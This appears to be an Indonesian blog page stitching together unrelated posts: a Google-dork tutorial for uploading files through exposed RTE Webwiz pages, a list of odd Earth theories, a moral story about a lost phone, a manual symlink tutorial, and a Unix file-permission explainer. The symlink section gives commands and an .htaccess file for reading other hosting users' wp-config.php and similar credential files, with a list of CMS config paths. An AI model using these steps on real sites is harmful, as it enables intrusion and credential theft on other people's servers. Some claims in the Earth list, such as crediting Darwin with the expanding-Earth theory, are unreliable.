RTE Webwiz Upload Vulnerability

dork :
     inurl:"/my_documents/my_files/"
     inurl:"RTE_popup_file_atch.asp"

lanjut caranya :

1. masukan dork di atas ke om google

2. buka salah satu target lalu ganti urlnya (khusus dork yg pertama, kalo make yg kedua tinggal upload) menjadi :

target.com/RTE_popup_file_atch.asp
atau
target.com/rte/RTE_popup_file_atch.asp
atau
target.com/admin/RTE_popup_file_atch.asp

3. maka akan nampak seperti ini :

4. upload file dengan ext :  zip, rar, doc, pdf, txt, rtf, htm, html, gif, jpg, png,

5. liat hasilnya di :

target.com/my_documents/my_files/filemu

atau liat aja di sebelah kanan, ada alamat url ama previewnya 

semoga bermanfaat, terima kasih ^_^

10 Teori Tentang Bumi Yang Paling Aneh dan Kontrovesial Sejagad

Di dunia ini, pengetahuan yang kita miliki sekarang ini adalah hasil dan buah karya dari kerja keras para peneliti dan orang-orang ternama terdahulu. Tentunya, seperti kebanyakan lainnya, untuk mencapai pengetahuan tersebut akan ada kegagalan dan kesalahan. Berikut ini adalah daftar 10 teori mengenai dunia atau bumi yang pernah dipercaya oleh manusia, bahkan ada beberapa diantaranya mungkin masih dipercaya.

1. Digital World Theory
Ini merupakan satu-satunya teori yang muncul pada zaman modern mengenai dunia kita ini, yang mengatakan bahwa kita sebenarnya hidup dalam sebuah simulasi komputer yang sangat besar dan semua benda bahkan diri kita adalah kumpulan kode. Memang terdengar sangat tidak masuk akal, tetapi teori ini kreatif dan menarik. Mungkin teori ini didapatkan karena perkembangan teknologi dan film-film seperti The Matrix.

Beberapa ilmuwan bahkan tidak dapat memastikan apakah kita memang hidup sebagai manusia atau hanya sekumpulan kode. Memang, ada yang mencoba membuktikan hal ini tetapi tidak ada yang penrah membuktikannya secara praktis. Jangan sampai ada yang menekan tombol ESC (escape). - teori ini juga pernah dimunculkan di artikel sebelumnya yaitu artikel 10 Cara Dunia akan Kiamat.

2. Round Earth Theory
Ya, ide yang paling dikenal banyak orang adalah teori mengenai bumi itu bulat yang juga dipercaya oleh kebanyakan orang hingga sekarang ini. Pada awalnya, sebelum kemunculan teori ini, teori yang paling banyak dipercaya adalah Flat Earth Theory yang akan dibahas di bawah. Seperti yang kita ketahui mengenai teori ini, teori ini mengatakan bahwa bumi itu bentuknya bulat menyerupai bola (walaupun tidak benar-benar bulat).

Orang yang paling dikaitkan dengan ide dari teori ini adalah Phytagoras yang mengkonfirmasikan teori Plato (filsuf Yunani Kuno) bahwa bumi itu bulat. Tetapi yang mungkin paling kita kenal adalah mengenai pelayaran Columbus (akan dibahas pada Flat Earth Theory di bawah).

3. Geoterrapinism Theory
Anda mungkin pernah melihat teori ini di film-film. Ada sebuah teori yang mengatakan bahwa kita sebenarnya hidup di punggung dari kura-kura raksasa, inilah teori Geoterapinisme. bisa jadi kita juga hidup di punggung gajah, ular atau unta, tetapi mari kita bahas mengenai kura-kura saja. Karena memang teori ini mengatakan demikian.

Mulai muncul di abad 17 oleh seorang pria bernama Jasper Danckaerts yang ia dapatkan dari suku pribumi asli Amerika. Uniknya, teori ini juga tidak hanya berasal dan dipercaya oleh suku pribumi asli Amerika, ada mitos serupa di kebudayaan Cina dan India. Mungkin gempa yang kita rasakan karena mood si kura-kura sedang tidak baik.

4. Flat Earth Theory
Pernah dipercaya sampai abad 17, teori ini mengatakan bahwa bumi itu bentuknya rata seperti sebuah piringan (disk). Teori ini dipercaya hingga para matematis Yunani dan orang-orang Eropa mempercaya bumi itu bulat. Miskonsepsi ini juga pernah dipercaya oleh Christopher Columbus (Penemu Benua Amerika), hingga pelayarannya memecahkan kepercayaannya sendiri. Oleh karena itu pelayarannya juga disebut sebagi 'Myth of the Flat Earth'.

Pada tahun 1956, sebuah perkumpulan yang Flat Earth Society yang mendukung teori ini dibuat. Bahkan pada tahun 1980, walaupun sudah ada bukti yang mengatakan bahwa bumi itu berbentuk menyerupai bola, salah satu orang dari perkumpulan ini yang bernama Charles Johnson mempublikasikan bahwa ia percaya bumi itu rata. Hal ini ia dapatkan dari melihat permukaan air danau yang rata, ia mengatakan jika bumi itu bulat maka setidaknya akan ada lengkungan (curvature) pada badan air.

5. Time Parallel Theory
Salah satu lagi teori unik mengenai bumi parallel. Serupa dengan teori Counter Earth, Time Parallel theory mengatakan bahwa ada "bumi lain" di luar sana. Teori ini mengatakan bahwa sebenarnya semua tindakan yang kita ambil sebenarnya sudah mempunyai wujud dan kehidupannya sendiri.

Ia mengatakan bahwa jika kita dihadapi oleh dua keputusan, keputusan A dan B, dan kita mengambil keputusan A, maka sebenarnya ada belahan diri kita yang lain hidup di dunia lain dengan keputusan B. Jadi teori ini mengatakan bahwa sebenarnya ada banyak sekali dunia selain dunia kita sebagai hasil dari setiap keputusan yang berbeda. Teori ini didapatkan sebagai hasil dari imajinasi akan mesin waktu.

6. Hollow Earth Theory
Teori ini dicetuskan oleh John Symmes, seorang mantan kapten Tentara Amerika pada perang tahun 1812. Ia mempercaya bahwa dunia ini mempunyai sebuah cangkang yang setebal 800 mil, dengan pembukaan pada kedua kutub dan beberapa lapisan dalam yang terdiri dari cengkungan-cengkungan. Cengkungan inilah tempat kita dan para hewan tinggal.

Jika Anda bingung, bayangkan Anda melihat bintang di malam hari, Anda tentu juga akan melihat kegelapan pekat malam hari bukan? Nah, John Symmes mengatakan bahwa apa yang Anda lihat sebenarnya adalah pusat dari Bumi atau Dunia kita ini.

7. Expanding Earth Theory
Beberapa orang percaya bahwa Bumi ini sebenarnya terus berkembang dan meluas. Kita juga tidak dapat mengatakan apa-apa mengenai pencetus ide ini, karena pencetus ide ini adalah orang ternama dalam pengetahuan, yaitu Charles Darwin. Teori ini sudah ditinggalkan oleh banyak orang.

Mungkin ia mendapatkan teori ini sebagai hasil bahwa pada awalnya bumi kita ini merupakan satu daratan dan kemudian terpecah. Mungkin ia berpikir bahwa perpecahan ini karena Bumi yang terus meluas hingga daratan ini terpisah, walaupun pada kenyataannya karena pergeseran lempengan bumi, zaman es dan seterusnya.

8. Time Cube Theory
Gene Ray adalah orang yang sangat unik, demi membuktikan teorinya, ia pergi ke MIT dan menantang professor-professor di sana dengan $10.000 bahwa mereka tidak dapat membuktikan bahwa teorinya salah. Tidak ada satupun professor yang menerima tantangan tersebut, banyak orang menganggap para professor tersebut menganggap Gene Ray tidak sepadan dengan waktu yang mereka habiskan, atau jangan-jangan para professor tidak ingin kita mengetahui kenyataan mengerikan ini. (Ah, yang benar saja...)

Teori yang dicetuskan oleh Gene Ray mengatakan bahwa Bumi ini terdiri dari 4 "titik waktu", berdasarkan sore hari, malam hari, pagi hari dan siang hari. Ia mengatakan penjelasan paling logis adalah bahwa 4 hari sebenarnya terjadi dalam waktu bersamaan, dan tidak ada hubungannya dengan rotasi bumi. Intinya yang dikatakan Gene Ray adalah apa yang kita bilang 1 hari adalah sebenarnya 4 hari.

9. Counter Earth Theory
Sepertinya tidak ada habisnya mengenai imajinasi akan adanya "Bumi Lain" di luar sana, Counter Earth Theory merupakan salah satu teori yang mengatakan mengenai hal ini. Ia mengatakan bahwa ada bumi parallel di alam semesta ini, kita tidak pernah melihatnya karena ia berada di orbit yang tepat berlawanan dengan orbit bumi kita ini dan berada di sisi lain dari matahari. Skenario ini juga ada di film tahun 2011, Another Earth.

Jika kita memikirkan mengenai fakta-fakta dan bukti-bukti yang sudah dikumpulkan dan telah ada sebelumnya, maka kita dapat mengatakan bahwa teori ini sebenarnya sangatlah tidak mungkin terjadi. Teori ini pada zaman terdahulu mungkin masih dapat diterima karena kurangnya teknologi untuk memantau, mefoto atua pergi luar angkasa. Tetapi dengan adanya teknologi sekarang ini kita dapat membuktikan bahwa tidak ada apa-apa di sisi lain orbit bumi dan matahari.

10. Fixed Earth Theory
Mungkin anda mengenal teori ini sebagai teori geosentris. Fixed Earth Theory atau teori geosentris mengatakan bahwa Bumi ini merupakan pusat dari Tata surya dan semua benda lainnya di tata surya mengitari bumi sebagai pusatnya. 

Yang mengagumkan adalah teori yang diargumentasikan oleh Ptolemy ini bertahan di grafik astrologi selama 1500 tahun. Hingga akhirnya dibuktikan salah oleh orang-orang seperti Copernicus, Galileo, atau Kepler. Percaya atau tidak, masih ada orang yang mempercayai teori ini hingga sekarang. Jika Anda bertemu dengan orang-orang ini, khususnya dalam sebuah pesta atau perjamuan bersama, Anda mungkin harus memikirkan kembali dimana letak kesalahan dari hidup Anda.

Nah, itulah beberapa teori aneh tentang bumi yang pernah dipercaya oleh sebagian orang di dunia. Menurut kamu bagaimana?

sumber : palinguniks.com

4 Skenario

Skenario 1
Andaikan kita sedang naik di dalam sebuah kereta ekonomi. Karena tidak mendapatkan tempat duduk, kita berdiri di dalam gerbong tersebut. Suasana cukup ramai meskipun masih ada tempat bagi kita untuk menggoyang-goyangkan kaki.

Kita tidak menyadari handphone kita terjatuh.

Ada orang yang melihatnya, memungutnya dan langsung mengembalikannya kepada kita. “Pak, handphone bapak barusan jatuh nih,” kata orang tersebut seraya memberikan handphone milik kita.

Apa yang akan kita lakukan kepada orang tersebut?
Mungkin kita akan mengucapkan terima kasih dan berlalu begitu saja.

Skenario 2
Sekarang kita beralih kepada skenario kedua. Handphone kita terjatuh dan ada orang yang melihatnya dan memungutnya.
Orang itu tahu handphone itu milik kita tetapi tidak langsung memberikannya kepada kita. Hingga tiba saatnya kita akan turun dari kereta, kita baru menyadari handphone kita hilang.

Sesaat sebelum kita turun dari kereta, orang itu ngembalikan handphone kita sambil berkata,
“Pak, handphone bapak barusan jatuh nih.”
Apa yang akan kita lakukan kepada orang tersebut?

Mungkin kita akan mengucapkan terima kasih juga kepada orang tersebut. Rasa terima kasih yang kita berikan akan lebih besar daripada rasa terima kasih yang kita berikan pada orang di skenario pertama (orang yang langsung memberikan handphone itu kepada kita). Setelah itu mungkin kita akan langsung turun dari kereta.

Skenario 3
Marilah kita beralih kepada skenario ketiga.
Pada skenario ini, kita tidak sadar handphone kita terjatuh, hingga kita menyadari handphone kita tidak ada di kantong kita saat kita sudah turun dari kereta. Kita pun panik dan segera menelepon ke nomor handphone kita, berharap ada orang baik yang menemukan handphone kita dan bersedia mengembalikannya kepada kita.

Orang yang sejak tadi menemukan handphone kita (namun tidak memberikannya kepada kita) menjawab telepon kita.
“Halo, selamat siang, Pak. Saya pemilik handphone yang ada pada bapak sekarang,” kita mencoba bicara kepada orang yang sangat kita harapkan berbaik hati mengembalikan handphone itu kembali kepada kita.
Orang yang menemukan handphone kita berkata,
“Oh, ini handphone bapak ya. Oke deh, nanti saya akan turun di stasiun berikut. Biar bapak ambil di sana nanti ya.”

Dengan sedikit rasa lega dan penuh harapan, kita pun pergi ke stasiun berikut dan menemui “orang baik” tersebut.
Orang itu pun memberikan handphone kita yang telah hilang.

Apa yang akan kita lakukan pada orang tersebut?

Satu hal yang pasti, kita akan mengucapkan terima kasih, dan seperti nya akan lebih besar daripada rasa terima kasih kita pada skenario kedua bukan? Bukan tidak mungkin kali ini kita akan memberikan hadiah kecil kepada orang yang menemukan handphone kita tersebut.

Skenario 4
Terakhir, mari kita perhatikan skenario keempat.

Pada skenario ini, kita tidak sadar handphone kita terjatuh, kita turun dari kereta dan menyadari bahwa handphone kita telah hilang, kita mencoba menelepon tetapi tidak ada yang mengangkat. Sampai akhirnya kita tiba di rumah.

Malam harinya, kita mencoba mengirimkan SMS :
“Bapak / Ibu yang budiman. Saya adalah pemilik handphone yang ada pada bapak / ibu sekarang.
Saya sangat mengharapkan kebaikan hati bapak / ibu untuk dapat mengembalikan handphone itu kepada saya.
Saya akan memberikan imbalan sepantasnya. ”
SMS pun dikirim dan tidak ada balasan. Kita sudah putus asa.

Kita kembali mengingat betapa banyaknya data penting yang ada di dalam handphone kita. Ada begitu banyak nomor telepon teman kita yang ikut hilang bersamanya. Hingga akhirnya beberapa hari kemudian, orang yang menemukan handphone kita menjawab SMS kita, dan mengajak ketemuan untuk mengembalikan handphone tersebut.

Bagaimana kira-kira perasaan kita?
Tentunya kita akan sangat senang dan segera pergi ke tempat yang diberikan oleh orang itu. Kita pun sampai di sana dan orang itu mengembalikan handphone kita.

Apa yang akan kita berikan kepada orang tersebut?

Kita pasti akan mengucapkan terima kasih sebesar-besarnya kepadanya, dan mungkin kita akan memberikannya hadiah (yang kemungkinan besar lebih berharga dibandingkan hadiah yang mungkin kita berikan di skenario ketiga).

RENUNGAN:

Apa yang kita dapatkan dari empat skenario cerita di atas?

Pada keempat skenario tersebut, kita sama-sama kehilangan handphone, dan ada orang yang menemukannya.

Orang pertama menemukannya dan langsung mengembalikannya kepada kita. Kita berikan dia ucapan terima kasih.

Orang kedua menemukannya dan memberikan kepada kita sesaat sebelum kita turun dari kereta.
Kita berikan dia ucapan terima kasih yang lebih besar.

Orang ketiga menemukannya dan memberikan kepada kita setelah kita turun dari kereta.
Kita berikan dia ucapan terima kasih ditambah dengan sedikit hadiah.

Orang keempat menemukannya, menyimpannya selama beberapa hari, setelah itu baru mengembalikannya kepada kita.
Kita berikan dia ucapan terima kasih ditambah hadiah yang lebih besar.

Ada sebuah hal yang aneh di sini.
Cobalah pikirkan, di antara keempat orang di atas, siapakah yang paling baik?
Tentunya orang yang menemukannya dan langsung Memberikannya kepada kita, bukan?

Dia adalah orang pada skenario pertama.

Namun ironisnya, dialah yang mendapatkan reward paling sedikit di antara empat orang di atas.

Manakah orang yang paling tidak baik?
Tentunya orang pada skenario keempat, karena dia telah membuat kita menunggu beberapa hari dan mungkin saja memanfaatkan handphone kita tersebut selama itu.

Namun, ternyata dia adalah orang yang akan kita berikan reward paling besar.

Apa yang sebenarnya terjadi di sini?
Kita memberikan reward kepada keempat orang tersebut secara tulus, tetapi orang yang seharusnya lebih baik dan lebih pantas mendapatkan banyak, kita berikan lebih sedikit.

OK, kenapa bisa begitu?

Ini karena rasa kehilangan yang kita alami semakin bertambah di setiap skenario.

Pada skenario pertama, kita belum berasa kehilangan karena kita belum sadar handphone kita jatuh, dan kita telah mendapatkannya kembali.

Pada skenario kedua, kita juga sudah mulai merasakan kehilangan karena saat itu kita baru sadar, dan kita sudah membayangkan rasa kehilangan yang mungkin akan kita alami seandainya saat itu kita sudah turun dari kereta.

Pada skenario ketiga, kita sempat merasakan kehilangan, namun tidak lama kita mendapatkan kelegaan dan harapan kita akan mendapatkan handphone kita kembali.

Pada skenario keempat, kita sangat merasakan kehilangan itu.

Kita mungkin berpikir untuk memberikan sesuatu yang besar kepada orang yang menemukan handphone kita, asalkan handphone itu bisa kembali kepada kita.

Rasa kehilangan yang bertambah menyebabkan kita semakin menghargai handphone yang kita miliki.

Kesimpulan :

Saat ini, adakah sesuatu yang kurang kita syukuri?

Apakah itu berupa rumah, handphone, teman-teman, kesempatan berkuliah, kesempatan bekerja, atau suatu hal lain.

Namun, apakah yang akan terjadi apabila segalanya hilang dari genggaman kita.
Kita pasti akan merasakan kehilangan yang luar biasa.

Saat itulah, kita baru dapat mensyukuri segala sesuatu yang telah hilang tersebut.

Namun, apakah kita perlu merasakan kehilangan itu agar kita dapat bersyukur?

Sebaiknya tidak.

Syukurilah segala yang kita miliki, termasuk hidup kita, selagi itu masih ada.
Jangan sampai kita menyesali karena tidak bersyukur ketika itu telah lenyap dari diri kita.

Jangan pernah mengeluh dengan segala hal yang belum diperoleh.
Bahagialah dengan segala hal yang telah diperoleh.

Sesungguhnya, hidup ini berisikan banyak kebahagiaan.
Bila kita mampu memandang dari sudut yang benar.


semoga bermanfaat, terima kasih ^_^

Cara Symlink Manual

yo,..
khusus yang master dilarang baca, ini hanya untuk newbie seperti saya

kali ini saya akan memberikan tutorial cara symlink secara manual
ok langsung saja :

pertama buat folder baru terserah, disini saya membuat folder bom
masuk kedalam folder tersebut lalu buat file .htaccess baru menggunakan code di bawah ini :

Options all 
DirectoryIndex Sux.html 
AddType text/plain .php 
AddHandler server-parsed .php 
AddType text/plain .html 
AddHandler txt .html 
Require None 
Satisfy Any

lalu save

kemudian ketik command :

ln -s / root

dan jika berhasil akan muncul folder root seperti ini :

lalu buka alamat foldernya

target.com/bom/root/
maka akan nampak seperti ini :

skarang tugas kita mencari target buat di intip

untuk melihat nama user dan domain nya
bisa reverse ip lalu cari nama user (biasanya mirip dengan nama domainnya) serta letak foldernya di root/etc/passwd

ato untuk lebih gampang gunakan tool untuk melihat user dan domain ambil di sini

misalkan target saya nama usernya >>  betterg

jadi untuk mengintip folder nya sepert ini

root/home/(nama user)/public_html/

root/home/betterg/public_html/

dan hasilnya :

tinggal intip file config nya dehh

untuk file config dari beberapa cms seperti ini :

vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php


lanjut cara kedua
hampir mirip sih tapi alamat direktorinya lebih singkat

masuk kedalam folder bom tadi lalu ketik command :

ln -s /home/(nama user)/public_html (nama folder yang dibuat)

ln -s /home/betterg/public_html koplak

dan hasilnya akan muncul folder koplak
masuk ke alamatnya

target.com/bom/koplak

ok, lanjut cara ketiga (headshoot)

masih di folder bom tadi, ketik command :

ln -s /home/(nama user)/public_html/(file config web) (file yg akan dibuat)

ln -s /home/betterg/public_html/wp-config.php ipin.txt

lalu buka alamat folder bom tadi

target.com/bom/

maka akan muncul file ipin.txt

dan hasilnya :

untuk file config dari beberapa cms seperti ini :

vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php

yup, sekian 

semoga bermanfaat, terima kasih ^_^

Penjelasan mengenai UNIX file permission

Salam Devilzc0de,
Berhubung masih banyak yang masih belum mengerti tentang hak akses pada Unix, ane mau share sedikit mengenai UNIX like file permission. (Linux, BSD, Macintosh, etc.)
Sebenernya ni tulisan udah lama, tp baru sekarang ane share dimari.  Semoga kaga repost karena ane tadi sempet cari dan belom ada thread khusus yg membahas mengenai hak akses ini. 

Note : Hanya untuk mereka yang baru memulai / harus / ingin mempelajari UNIX> Bagi temen2 yang sudah terbiasa menggunakan UNIX, membaca tulisan saya ini hanya buang-buang waktu. 

Mungkin temen-temen pernah liat yg ky begini :

Code:

ditatompel@2nd-Heartbeat ~/codes/bot $ ls -lh
total 404K
drwxr-xr-x 2 ditatompel ditatompel 4.0K 2011-11-06 08:02 crayonbot
drwxr-xr-x 6 ditatompel ditatompel 4.0K 2011-11-10 23:32 devilzb0t
-rw-r--r-- 1 ditatompel ditatompel 1.2K 2011-10-06 14:09 emabot.py
-rw-r--r-- 1 ditatompel ditatompel 4.2K 2011-10-25 03:24 twc1.0.py
-rw------- 1 ditatompel ditatompel 3.7K 2011-10-26 03:28 webbot.py

Nah lo, Apaan tuh? om? 
Tenang, itu cuma list isi sebuah folder, mari kita perhatian ouput ini : 

Code:

drwxr-xr-x 2 ditatompel ditatompel 4.0K 2011-11-06 08:02 crayonbot

Sudah? Lihat pada spasinya. Di sana nampak ada 8 field!
Field 1 : drwxr-xr-x
Field 2 : 2 => sebuah angka yang menunjukan berapa user / group yang sedang mengeksekusi / mengakses file / folder tersebut.
Field 3 : ditatompel => menunjukan siapa yg memiliki file tersebut. ( Owner )
Field 4 : ditatompel => menunjukan siapa yg memiliki file tersebut. ( Group )
Field 5 : 4.0K => menunjukan besarnya file tersebut.
Field 6 dan 7 : 2011-11-06 08:02 =>adalah jam dan tanggal kapan terakhir kalinya file tersebut dimodifikasi.
dan terakhir : crayonbot => adalah nama file / folder itu sendiri.

Mari kita kupas yang field 1 lebih dalam, tapi jangan terlalu dalam... 
Field 1 : drwxr-xr-x
Apa itu bro?
Itu yang namanya permission di sistem UNIX. Normalnya ada 10 digit.
Sekarang biar bacannya gampang, liat 'unyu2' di bwh ini yang 'sesuatu banget' 

Code:

d rwx r-x r-x
|  |   |   |
|  |   |   +-- user lain permission
|  |   +------ group permission
|  +---------- owner permission
+------------- tipe file -> (d) = directory / folder, (-) = file

Dengan penjelasan sebagai berikut :
r = Read -> boleh membaca
w = Write -> boleh memodifikasi
x = eXecute -> boleh mengeksekusi ( biasanya untuk aplikasi )

Jadi bisa disimpulkan bahwa kode drwxr-xr-x adalah :
Sebuah folder yang owner / pemilik boleh membuka, menulisi / mengubah / membuat file di dalam tersebut, sedangkan group dan user lain hanya boleh membaca dan mengeksekusi saja.

Kalau -rw-r--r-- ?
Berarti sebuah file yang user / pemilik file boleh membaca dan mengubah file, sedangkan yang lain hanya boleh membaca saja.

Trus kalau -rw------- ?
Berarti sebuah file yang user / pemilik file boleh membaca dan mengubah file, sedangkan user lain membaca file tersebut pun tidak diperkenankan. 

Di sini sudah ngerti?  Kalau udah, mari lanjut ke versi Binary dan Octal

UNIX Binary dan Octal File Permission
Pernah mengalami error / warning pada aplikasi website yg mengandung 'permission denied'?
lalu mencari solusinya di google dan banyak yang menyarankan ganti saja file permissionnya jadi 777?
Sekedar memberi tahu, permission 777 berarti anda memberikan hak kepada semua user untuk melihat, mengubah, dan mengeksekusi file / folder tersebut.
Sebelumnya jika belum bisa / belum tau bagaimana membaca binary, silahkan lihat di http://devilzc0de.org/forum/thread-12040.html

Code:

0: 000 => --- => 0
1: 001 => --x => 1
2: 010 => -w- => 2
3: 011 => -wx => 3
4: 100 => r-- => 4
5: 101 => r-x => 5
6: 110 => rw- => 6
7: 111 => rwx => 7

Sehingga :

Code:

0 --- tanpa permission
1 --x execute
2 -w- write
3 -wx write and execute
4 r-- read
5 r-x read and execute
6 rw- read and write
7 rwx read, write and execute

jadi jika anda mengubah file permission menjadi 777 maka -> drwxrwxrwx atau -rwxrwxrwx -> Damn sh17 happens and server bleed.. 

Untuk block file system ( karakter pertama ) sebenernya bukan cuma ( - ) sama ( d ) aja.. Ada yang lain juga seperti :
l => Symbolic link
c => Character special device
b => Block special device
p => FIFO
s => Socket
File system kek gini biasa banyak ditemui di directory /dev

Sedangkan untuk tipe file permiision selain - r w x ada juga access mode ( s ) sama stcky ( t ). nah untuk ( s ) bisa jd suid dan sgid.

Sekian dulu dari saya. Semoga berguna bagi teman2 yang baru mengenal Unix atau mungkin temen2 yang sedang memperdalam web hacking karena kebanyakan web server menggunakan Unix like OS. 
Silahkan untuk teman2 lain yang ining memberi tambahan dan penjelasan lebih lengkap.  

Terima kasih. 

Killu4 Wrote:  

Quote:l => Symbolic link
c => Character special device
b => Block special device
p => FIFO
s => Socket

Ada penjelasan lebih lanjut tentang yg ini ga om dita ?

poke om Killu4 dan om starsz³ ;
Ane coba jelasin semampu dan setahu ane yah.. 

l => Symbolic link
Untuk symbolic link cara kerjanya mirip seperti shortcut. Jadi dia bisa bikin copy dari 1 file menjadi beberapa file ke direktori tertentu. Biasanya digunakan untuk konfigurasi aplikasi.
Contohnya bisa diliat dari gambar dibawah :

Gambar diatas adalah contoh membuat symlink script admin-location-lookup-1.0.php pada folder /srv/http/devel/labs ke folder /home/dit/codes dengan nama file adminscan.
Jadi saat kita eksekusi file adminscan tersebut, maka secara tidak langsung kita mengeksekusi file /srv/http/devel/labs/admin-location-lookup-1.0.php

c => Character special device & b => Block special device
Untuk character special devices dan block special device biasanya merupakan file binary untuk driver / partisi / device tertentu. Misalnya usb modem / partisi yang ada pada harddisk.

p => FIFO ( First In First Out )
Salah satu fitur istimewa dari Unix. Dengan FIFO memungkinkan data ditransfer dari satu aplikasi ke aplikasi lainnya.
FIFO fungsinya sama seperti "pipe". ( simbol | )
Misalnya penggunaan grep, sort, less, dll 

Code:

cat username.txt password.txt | grep admin | sort | less

Atau kalau ingin membuat contoh file FIFO bisa menggunakan command :

Code:

mkfifo namafile

Dari terminal itu coba jalankan perintah :

Code:

cat namafile

kemudian buka terminal lain, jalankan : 

Code:

cat > namafile

lalu ketikan kata2 pada terminal tersebut. Maka terminal sebelumnya akan mengeluarkan output dari terminal 1 nya.

Untuk lebih jelas bisa lihat pada video yang sudah ane upload. 

s => Socket
Sebuah file socket diciptakan oleh sistem ketika sebuah program melakukan 'bind' pada unix soket. Misalnya MySQL.

Ketika MySQL server dijalankan, maka sistem akan membuat file socket pada /var/run/mysql.sock atau /var/run/mysqld/mysqld.sock ( Tergantung sistem masing2 )

nah ane upload video di youtube, semoga lebih mudah memahami tentang FIFO dan socket.




sumber : devilzc0de